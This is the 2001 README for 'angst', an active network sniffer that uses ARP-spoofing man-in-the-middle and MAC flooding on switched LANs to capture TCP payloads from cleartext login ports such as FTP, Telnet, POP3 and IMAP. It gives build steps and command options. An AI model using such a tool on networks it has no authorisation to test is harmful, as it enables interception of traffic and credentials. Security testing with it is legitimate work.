angst - an active sniffer by Patroklos Argyroudis [ Introduction ] Angst is an active sniffer, based on libpcap and libnet. Angst provides methods for aggressive sniffing on switched local area network environments. It dumps the payload of all the TCP packets received on the specified ports. Moreover, it implements methods for active sniffing. Angst currently provides two active sniffing methods. The first monitors ARP requests, and after enabling IP forwarding on the local host, sends ARP replies mapping all IPs to the local MAC address. The second method floods the local network with random MAC addresses (like macof v1.1 by Ian Vitek), causing switches to send packets to all ports. Made just for testing purposes and fun. If you compile it on any other platform except the ones listed below, please contact me at the above email address. As always, published under a BSD style license, see the included LICENSE file. [ Supported platforms ] Angst has been thoroughly tested on the following platforms: OpenBSD 2.8 (i386) OpenBSD 2.7 (i386) OpenBSD 2.6 (i386) Also, angst is known to compile and run on: FreeBSD 4.2-STABLE (i386) NetBSD 1.4.2 (i386) Slackware Linux 7.1, with 2.2.13 kernel (i386) [ Compilation and installation ] You must first build and install libpcap and libnet. BSD systems have libpcap installed by default. If you test it on any other platform except the ones mentioned, send me the diffs. It should be portable since it is based on libpcap and libnet. If you run {Free,Net,Open}BSD simply type: make If you run Linux type: make -f Makefile.linux In order to compile with debug support, edit the Makefile that corresponds to your platform and remove the comment from -DDEBUG. In order to install angst type: make install This will install the angst binary to /usr/local/sbin and the angst manual page to /usr/local/man/man8. To uninstall angst type: make uninstall [ Usage ] By invoking angst with the -h switch you get the following help message: [ angst - an active sniffer ] [ Patroklos Argyroudis ] usage: angst [active sniffing method] [active sniffing options] [options] active sniffing methods: [ -a man-in-the-middle ARP method ] [ -f flood random MAC addresses method ] active sniffing options: [ -d don't try to enable IP forwarding on the local host ] [ -s specify the seconds between each flooding for flood method, or the seconds between the injection of the fake ARP replies ] [ -c specify the number of packets to flood, for flood method ] options: [ -h this help message ] [ -p don't put the interface into promiscuous mode ] [ -r resolve IP addresses ] [ -v display the version number and exit ] [ -i specify which interface to use ] [ -l specify the log filename ] [ -e specify the port numbers to build the filter expression ] Note that there are default values for all the command line arguments. In order to keep things cleaner, you cannot specify a filter expression as a command line option. In order to monitor other ports than the default ones (21, 23, 110, 143) you have to specify them with the -e switch. The -e switch accepts comma separated numbers, and by using them it builds a correct filter expression. An example usage of the -e switch is: # ./angst -a -e 23,25,113 warning: the filter expression is arp or (tcp and (dst port 23 or dst port 25 or dst port 113)) As you can see, angst always informs you about the filter expression when the -e switch is used. Moreover, in order for the man-in-the-middle ARP method to work, IP forwarding must be enabled on the local host. The -d switch is useful when you want to enable IP forwarding yourself, and not let angst to do it for you. [ Download ] You can find angst at: http://ntrg.cs.tcd.ie/~argp/software/ and/or at: http://angst.sourceforge.net/ [ Music ] Hocico, Velvet Acid Christ, and Suicide Commando mostly. [ Acknowledgments ] Ioanna Stamouli, for support, discussions, and ideas. Georgios Kargiotakis, for interesting discussions. Jackal for his libpcap based code, some years ago. Scut for his cool mail about the man-in-the-middle method. -- Patroklos Argyroudis http://ntrg.cs.tcd.ie/~argp/ $Id: README,v 1.35 2001/02/07 18:41:25 argp Exp $